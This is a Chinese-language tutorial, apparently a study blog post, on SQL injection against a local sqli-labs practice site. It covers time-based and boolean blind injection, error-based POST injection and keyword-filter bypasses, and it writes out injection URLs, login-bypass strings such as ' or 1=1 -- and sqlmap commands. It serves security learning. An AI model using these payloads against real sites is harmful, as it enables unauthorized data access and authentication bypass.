Web安全攻防的学习——06—(盲注介绍、GET基于时间的盲注、GET基于Boolean的盲注、POST基于错误的注入、POST基于时间的盲注、SQL注入绕过手段)(重点)

1、盲注介绍

Blind SQL(盲注)是注入攻击的其中一种,向数据库发生true或false这样的问题,并根据应用程 序返回的信息判断结果。这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有解决SQL注入存在的代码问题

盲注种类

• 1.布尔类型
• 2.时间的盲注

GET基于时间的盲注

if(ascii(substr(database(),1,1))=115,1,sleep(3))  # 如果ascii(substr(database(),1,1))=115执行成功，返回1，否则返回sleep(3)
当数据库名第一个字母的ASCII码等于115时,执行一次sleep(3)函数等待3秒

substr(str,pos,len)   # 从pos的位置截取长度为len的str的字符串
ascii(s)=115       # 将字符串转化为数字  是否都等于115 

1.判断是否存在注入点

http://127.0.0.1/sqli/Less-5/?id=1' if(1=0,sleep(3),1) --+

2.判断数据库的长度

http://127.0.0.1/sqli/Less-5/?id=1' if(length(database())=8,sleep(3),1) --+

http://127.0.0.1/sqli/Less-5/?id=1' if(length(database())=9,sleep(3),1) --+

3.判断数据库的名字

http://127.0.0.1/sqli/Less-5/?id=1' if(ascii(substr(database(),1,1))=115,1,sleep(3)) --+

GET基于Boolean的盲注

基于布尔的盲注,我们通常采用下面的办法猜解字符串

1、当页面显示为You are in时候，说明写的sql语句是正确的。

http://127.0.0.1/sqli/Less-5/?id=1‘ and length(database())=3 --+

2、判断数据库的名字

http://127.0.0.1/sqli/Less-5/?id=1’ and (select ascii(substr(database(),1,1))=115) --+
数据库第一个字符串为s,ASCII码为115

扫描二维码关注公众号，回复： 9543795 查看本文章

sqlmap安全测试

python sqlmap.py -u “http://127.0.0.1/sqli/Less-8/?id=1” --technique T --dbs
python sqlmap.py -u “http://127.0.0.1/sqli/Less-8/?id=1” --technique B --dbs

POST基于错误的注入

特点:

• 1.POST请求不能被缓存下来
• 2.POST请求不会保存在浏览器浏览记录中
• 3.以POST请求的URL无法保存为浏览器书签
• 4.POST请求没有长度限制

POST基于错误单引号注入
注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。可以借助对应的插件完 成修改任务

根据之前学习的字符串注入内容，我们推断

报错信息：' 123 ' LIMIT 0,1 '
请求参数为：uname=admin'&passwd=123&submit=Submit                  说明错误部分注入点在password

正确的sql语句为:
select * from xxx where uname= 'xxx' and passwd= 'xxx';

注入语句修改为：使得整个where语句结果为True
select * from xxx where uname= 'xxx' or 1=1 -- ' and passwd= 'xxx';

' or 1=1 -- #这是我们需要注入的sql语句部分，人为添加的内容，使之闭合单引号

单引号注入完成如下：

POST基于错误双引号注入
注入点位置发生了变化,在浏览器中已经无法直接进行查看与修改。可以借助对应的插件完 成修改任务。

根据之前学习的字符串注入内容，我们推断（重点）

报错信息：' 123 " ) LIMIT 0,1 '
请求参数为：uname=admin"&passwd=123&submit=Submit                  说明错误部分注入点在password

正确的sql语句为:
select * from xxx where uname= ("xxx") and passwd= 'xxx';

注入语句修改为：使得整个where语句结果为True
select * from xxx where uname= ("xxx") or 1=1 -- ") and passwd= 'xxx';

") or 1=1 -- #这是我们需要注入的sql语句部分，人为添加的内容，使之闭合双引号和括号

双引号注入完成如下：

sqlmap安全测试

python sqlmap.py -r target.txt -p passwd --technique E
targer.txt文件中是当前网址的请求,加上发送的参数
–technique E ------- 基于error的探测技术
-p passwd -----------指定探测参数

POST基于时间的盲注

在存在注入点POST提交的参数后加

and (select (if(length(database())>5,sleep(5),null))) –
如果执行的页面响应时间大于5秒,肯定就存在注入,并且对应的SQL语句执行

POST基于布尔的盲注

在存在注入点POST提交的参数后加入if判断语句

and length(database())=8 –
如果能够登陆成功，说明POST基于布尔的盲注成功

select length(database());

select substr(database(),1,1);

select ascii(substr(database(),1,1)); 

select ascii(substr(database(),1,1)) > N; 

select ascii(substr(database(),1,1)) = N; 

select ascii(substr(database(),1,1)) < N;

2、SQL注入绕过手段

如果程序中设置了过滤关键字,但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只是对整体进行过滤。例如: and 过滤,当然这种过滤只是发现关键字出现,并不会对关键字处理

大小写绕过
通过修改关键字内字母大小写来绕过过滤措施。例如:

AnD 1=1
order by 可以使用 OrdER来进行绕过

双写绕过
如果在程序中设置出现关键字之后替换为空,那么SQL注入攻击也不会发生。对于这样的过滤策略可以使用双写绕过。因为在过滤过程中只进行了一次替换。就是将关键字替换为空

uniunionon union替换为空,也可以结合大小写绕过

编码绕过
可以利用URL编码工具,绕过SQL注入的过滤机制
URL编码解码

内联注释绕过
在MySQL中内联注释中的内容可以被当做SQL语句执行

/!select/ * from users;